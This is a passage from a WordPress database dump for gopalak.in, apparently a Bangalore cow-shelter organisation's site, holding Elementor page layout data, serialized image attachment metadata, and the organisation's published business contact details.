Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9120,1563,'_elementor_page_assets','a:0:{}'),(9123,1564,'_wp_attached_file','2022/10/depositphotos_12743475-stock-photo-farm-cattle-1.webp'),(9124,1564,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:61:\"2022/10/depositphotos_12743475-stock-photo-farm-cattle-1.webp\";s:8:\"filesize\";i:39060;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:61:\"depositphotos_12743475-stock-photo-farm-cattle-1-300x200.webp\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:15924;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:61:\"depositphotos_12743475-stock-photo-farm-cattle-1-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6678;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:61:\"depositphotos_12743475-stock-photo-farm-cattle-1-320x320.webp\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:19202;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:59:\"depositphotos_12743475-stock-photo-farm-cattle-1-50x33.webp\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:780;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:61:\"depositphotos_12743475-stock-photo-farm-cattle-1-100x100.webp\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3560;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:59:\"depositphotos_12743475-stock-photo-farm-cattle-1-48x32.webp\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:790;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:59:\"depositphotos_12743475-stock-photo-farm-cattle-1-48x32.webp\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:790;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9125,1565,'_wp_attached_file','2022/10/download-7-1.jpg'),(9126,1565,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:310;s:6:\"height\";i:163;s:4:\"file\";s:24:\"2022/10/download-7-1.jpg\";s:8:\"filesize\";i:10850;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"download-7-1-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13836;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"download-7-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7013;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:22:\"download-7-1-50x26.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:26;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:851;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:24:\"download-7-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3471;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:22:\"download-7-1-48x25.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:25;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:765;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:22:\"download-7-1-48x25.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:25;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:765;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9127,1566,'_wp_attached_file','2022/10/download-8-1.jpg'),(9128,1566,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:275;s:6:\"height\";i:183;s:4:\"file\";s:24:\"2022/10/download-8-1.jpg\";s:8:\"filesize\";i:6015;s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"download-8-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4618;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:22:\"download-8-1-50x33.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:907;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:24:\"download-8-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2601;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:22:\"download-8-1-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:781;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:22:\"download-8-1-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:781;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9129,1567,'_wp_attached_file','2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp'),(9130,1567,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:400;s:4:\"file\";s:59:\"2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\";s:8:\"filesize\";i:39060;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"depositphotos_12743475-stock-photo-farm-cattle-300x200.webp\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:15924;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"depositphotos_12743475-stock-photo-farm-cattle-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:6678;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:59:\"depositphotos_12743475-stock-photo-farm-cattle-320x320.webp\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:19202;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:57:\"depositphotos_12743475-stock-photo-farm-cattle-50x33.webp\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:780;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:59:\"depositphotos_12743475-stock-photo-farm-cattle-100x100.webp\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:3560;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:57:\"depositphotos_12743475-stock-photo-farm-cattle-48x32.webp\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:790;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:57:\"depositphotos_12743475-stock-photo-farm-cattle-48x32.webp\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/webp\";s:8:\"filesize\";i:790;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9131,1568,'_wp_attached_file','2022/10/download-7.jpg'),(9132,1568,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:310;s:6:\"height\";i:163;s:4:\"file\";s:22:\"2022/10/download-7.jpg\";s:8:\"filesize\";i:10850;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"download-7-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13836;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"download-7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7013;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:20:\"download-7-50x26.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:26;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:851;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"download-7-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3471;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:20:\"download-7-48x25.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:25;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:765;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:20:\"download-7-48x25.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:25;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:765;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9133,1569,'_wp_attached_file','2022/10/download-8.jpg'),(9134,1569,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:275;s:6:\"height\";i:183;s:4:\"file\";s:22:\"2022/10/download-8.jpg\";s:8:\"filesize\";i:6015;s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"download-8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4618;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:20:\"download-8-50x33.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:907;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"download-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2601;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:20:\"download-8-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:781;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:20:\"download-8-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:781;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9136,1571,'_wp_attached_file','2022/10/adopt.jpg'),(9137,1571,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:628;s:4:\"file\";s:17:\"2022/10/adopt.jpg\";s:8:\"filesize\";i:80991;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"adopt-300x157.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:157;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17636;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"adopt-1024x536.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99946;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"adopt-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9773;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"adopt-768x402.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:402;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67102;}s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:17:\"adopt-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27151;s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:15:\"adopt-50x26.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:26;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1822;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:17:\"adopt-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5693;}s:15:\"thaps-thumb-img\";a:5:{s:4:\"file\";s:15:\"adopt-48x25.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:25;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1761;}s:16:\"taiowc-thumb-img\";a:5:{s:4:\"file\";s:15:\"adopt-48x25.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:25;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1761;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(9150,1574,'_elementor_edit_mode','builder'),(9151,1574,'_elementor_template_type','wp-page'),(9152,1574,'_elementor_version','3.7.8'),(9153,1574,'_wp_page_template','elementor_canvas'),(9154,1574,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Group-122.png\",\"id\":1543,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thaps-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":32.792000000000002},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":9.5269999999999992},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":6.8070000000000004},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":10.93},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.159000000000001},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.058999999999999},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\",\"id\":1544,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus 